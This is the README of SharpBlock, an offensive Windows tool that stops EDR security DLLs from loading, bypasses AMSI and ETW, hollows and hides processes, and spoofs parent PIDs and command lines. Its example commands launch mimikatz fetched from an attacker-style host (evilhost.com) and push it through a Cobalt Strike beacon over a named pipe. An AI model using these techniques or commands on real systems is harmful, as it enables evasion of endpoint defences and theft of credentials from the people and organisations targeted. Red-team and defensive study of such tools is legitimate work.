SharpBlock

A method of bypassing EDRs' active protection DLLs by preventing entry point execution.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable by scanners looking for Amsi.dll code patches at runtime.
  • Host process is replaced with an implant PE that can be loaded from disk, HTTP or a named pipe (Cobalt Strike).
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using a stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when the callee is within the address range of a blocked DLL.

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL:

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using a Cobalt Strike beacon over a named pipe, using notepad as the host process and blocking SylantStrike's DLL:

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note: for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager.

Accompanying Blog Posts:
